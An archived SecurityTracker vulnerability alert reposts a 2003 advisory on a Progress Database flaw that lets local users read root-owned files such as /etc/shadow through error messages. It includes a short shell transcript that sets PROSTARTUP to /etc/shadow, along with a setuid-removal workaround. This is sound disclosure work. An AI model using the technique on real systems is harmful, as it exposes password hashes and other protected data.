SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Database)  >   Progress Database Vendors:   Progress Software Corporation
Progress Database Configuration File Error Messages May Disclose Root-Owned Information to Local Users
SecurityTracker Alert ID:  1006457
SecurityTracker URL:  http://securitytracker.com/id/1006457
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 4 2003
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 7 - 9
Description:   An information disclosure vulnerability was reported in the Progress Database. A local user can view some root-owned information.

Secure Network Operations Strategic Reconnaissance Team reported that a local user can make the software read arbitrary files with root privileges and display portions of the file contents as part of an error message. A local user can reportedly specify a configuration file to be read (even if the file is not a configuration file), regardless of the privileges of the local user. The file to be read is set via an environment variable, such as the PROSTARTUP variable. If the file is not the appropriate configuration file, some of the contents will be displayed to the user, according to the report.

A demonstration exploit transcript is provided:

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

The vendor has reportedly been notified.

Impact:   A remote user can view portions of arbitrary root-owned files on the system.
Solution:   No solution was available at the time of this entry. The vendor is reportedly working on a fix.

The author of the report indicates that, as a workaround, you can remove the set user id (setuid) bit from all setuid binaries in the $DLC folder.

Vendor URL:  www.progress.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read


This is a multi-part message in MIME format.
--------------010403030908010306040601
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

This data can be found at http://www.secnetops.biz/research

-KF



--------------010403030908010306040601
Content-Type: text/plain;
 name="SRT2003-04-02-1735.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="SRT2003-04-02-1735.txt"

Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team	            research@secnetops.com
Team Lead Contact		                  kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number		: SRT2003-04-02-1735
Product			: Progress Database 
Version			: Versions 7 to 9 
Vendor			: progress.com
Class			: local
Criticality             : Medium to Low
Operating System(s)	: Linux, SunOS, SCO, TRU64, *nix


High Level Explination
************************************************************************
High Level Description	: Error messages can provide root owned data
What to do		: chmod -s all suid binaries in /usr/dlc


Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed. 
Low Level Description	: 

The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running thr program has the 
permission to read the configuration file. A user can simply specify 
a root owned file and cause an error message to be generated to view 
the file contents. Most versions beyond v6 appear to be affected. 

An example variable that can be abused is the PROSTARTUP variable.

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER   : ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER   : ** Could not recognize argument: daemon:*::0:0. (301)

Luckily on the machine I chose to exploit the line that was read from the 
shadow file did not have an encrypted hash. This however is not always 
the case. 

Patch or Workaround	: chmod -s all suid binaries in the $DLC folder
Vendor Status	: vendor has been notified and is working on a fix
Bugtraq URL	: to be assigned 

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.



--------------010403030908010306040601--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC